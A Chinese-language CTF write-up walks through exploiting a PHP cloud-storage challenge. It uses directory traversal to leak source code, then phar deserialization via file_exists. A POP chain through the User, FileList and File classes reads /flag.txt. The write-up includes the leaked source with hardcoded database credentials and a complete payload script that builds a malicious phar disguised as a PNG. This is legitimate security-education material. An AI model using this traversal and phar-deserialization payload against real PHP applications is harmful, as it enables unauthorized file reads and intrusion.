2018年的Black Hat上安全研究员Sam Thomas分享了议题It’s a PHP unserialization vulnerability Jim, but not as we know it
,利用phar文件会以序列化形式储存用户自定义的meta-data并在导入的时候自动进行反序列化的特性,拓宽了php反序列化漏洞的攻击面,可以在不存在unserialize()的情况下进行反序列化操作,并且phar文件的识别是依靠它特定的文件头,所以它可以修改为任意后缀从而绕过部分的过滤
ps.2018年提出的议题,2019年就出成题目了,CTF和前沿研究还是很紧密的。
进入题目看见的是登录注册功能,先注册一个账户登入发现是一个云盘功能,可以上传下载删除图片。在测试功能后发现,下载部分存在目录穿越,但是尝试直接获取flag无果,看到源码发现有过滤
将lena.png修改为../../download.php
获取到download.php的源代码,同样方法获取delete.php和index.php
<?php
session_start();
if (!isset($_SESSION['login'])) {
header("Location: login.php");
die();
}
if (!isset($_POST['filename'])) {
die();
}
include "class.php";
chdir($_SESSION['sandbox']);
$file = new File();
$filename = (string) $_POST['filename'];
if (strlen($filename) < 40 && $file->open($filename)) {
$file->detele();
Header("Content-type: application/json");
$response = array("success" => true, "error" => "");
echo json_encode($response);
} else {
Header("Content-type: application/json");
$response = array("success" => false, "error" => "File not exist");
echo json_encode($response);
}
?>
发现有包含class.php,下载class.php
<?php
error_reporting(0);
$dbaddr = "127.0.0.1";
$dbuser = "root";
$dbpass = "root";
$dbname = "dropbox";
$db = new mysqli($dbaddr, $dbuser, $dbpass, $dbname);
class User {
public $db;
public function __construct() {
global $db;
$this->db = $db;
}
public function user_exist($username) {
$stmt = $this->db->prepare("SELECT `username` FROM `users` WHERE `username` = ? LIMIT 1;");
$stmt->bind_param("s", $username);
$stmt->execute();
$stmt->store_result();
$count = $stmt->num_rows;
if ($count === 0) {
return false;
}
return true;
}
public function add_user($username, $password) {
if ($this->user_exist($username)) {
return false;
}
$password = sha1($password . "SiAchGHmFx");
$stmt = $this->db->prepare("INSERT INTO `users` (`id`, `username`, `password`) VALUES (NULL, ?, ?);");
$stmt->bind_param("ss", $username, $password);
$stmt->execute();
return true;
}
public function verify_user($username, $password) {
if (!$this->user_exist($username)) {
return false;
}
$password = sha1($password . "SiAchGHmFx");
$stmt = $this->db->prepare("SELECT `password` FROM `users` WHERE `username` = ?;");
$stmt->bind_param("s", $username);
$stmt->execute();
$stmt->bind_result($expect);
$stmt->fetch();
if (isset($expect) && $expect === $password) {
return true;
}
return false;
}
public function __destruct() {
$this->db->close();
}
}
class FileList {
private $files;
private $results;
private $funcs;
public function __construct($path) {
$this->files = array();
$this->results = array();
$this->funcs = array();
$filenames = scandir($path);
$key = array_search(".", $filenames);
unset($filenames[$key]);
$key = array_search("..", $filenames);
unset($filenames[$key]);
foreach ($filenames as $filename) {
$file = new File();
$file->open($path . $filename);
array_push($this->files, $file);
$this->results[$file->name()] = array();
}
}
public function __call($func, $args) {
array_push($this->funcs, $func);
foreach ($this->files as $file) {
$this->results[$file->name()][$func] = $file->$func();
}
}
public function __destruct() {
$table = '<div id="container" class="container"><div class="table-responsive"><table id="table" class="table table-bordered table-hover sm-font">';
$table .= '<thead><tr>';
foreach ($this->funcs as $func) {
$table .= '<th scope="col" class="text-center">' . htmlentities($func) . '</th>';
}
$table .= '<th scope="col" class="text-center">Opt</th>';
$table .= '</thead><tbody>';
foreach ($this->results as $filename => $result) {
$table .= '<tr>';
foreach ($result as $func => $value) {
$table .= '<td class="text-center">' . htmlentities($value) . '</td>';
}
$table .= '<td class="text-center" filename="' . htmlentities($filename) . '"><a href="#" class="download">下载</a> / <a href="#" class="delete">删除</a></td>';
$table .= '</tr>';
}
echo $table;
}
}
class File {
public $filename;
public function open($filename) {
$this->filename = $filename;
if (file_exists($filename) && !is_dir($filename)) {
return true;
} else {
return false;
}
}
public function name() {
return basename($this->filename);
}
public function size() {
$size = filesize($this->filename);
$units = array(' B', ' KB', ' MB', ' GB', ' TB');
for ($i = 0; $size >= 1024 && $i < 4; $i++) $size /= 1024;
return round($size, 2).$units[$i];
}
public function detele() {
unlink($this->filename);
}
public function close() {
return file_get_contents($this->filename);
}
}
?>
因为在download和delete中都包含file的open函数,到class中查看发现open函数的实现
public function open($filename) {
$this->filename = $filename;
if (file_exists($filename) && !is_dir($filename)) {
return true;
} else {
return false;
}
}
存在file_exists
和is_dir
函数,它们可以对phar文件进行反序列化操作且没有任何过滤,我们就可以尝试构造调用链了。
仔细观察发现File类
中的close()
函数存在file_get_contents($this->filename)
可以进行文件读取,所以我们调用的终点就是这个函数,之后发现User类
中有__destruct()
可以调用close()
,但是成功调用后没有办法回显,又看了一下FileList类,发现存在__call()
魔法方法,所以大致的调用链可以构造为
先是User
调用__destruct()
,使db
为FileList类
,调用FileList
的close()
,但是FileList
不存在close()
函数,所以调用__call()
方法,使file
为一个File类
的数组,从而调用File类
的close()
,当$filename为flag的文件名时就可以读取到flag,再经过FileList
的__destruct()
来回显
payload如下
<?php
class User {
public $db;
}
class File {
public $filename = '/flag.txt';
}
class FileList{
private $files;
public function __construct(){
$this -> files = array(new File());
}
}
$a = new User();
$a->db = new FileList();
$phar = new Phar('test.phar');
$phar->startBuffering();
$phar->addFromString('xxx.txt', 'xxx');
$phar->setStub('<?php __HALT_COMPILER(); ? >');
$phar->setMetadata($a);
$phar->stopBuffering();
?>
因为在download.php中存在ini_set("open_basedir", getcwd() . ":/etc:/tmp");
导致只能访问/etc和/tmp文件夹,所以使用删除功能来获取flag
生成一个test.phar文件,上传拦截后修改后缀为png图片格式,上传后,点删除,抓包修改删除文件名为filename=phar://test.png
,在返回信息中获取到flag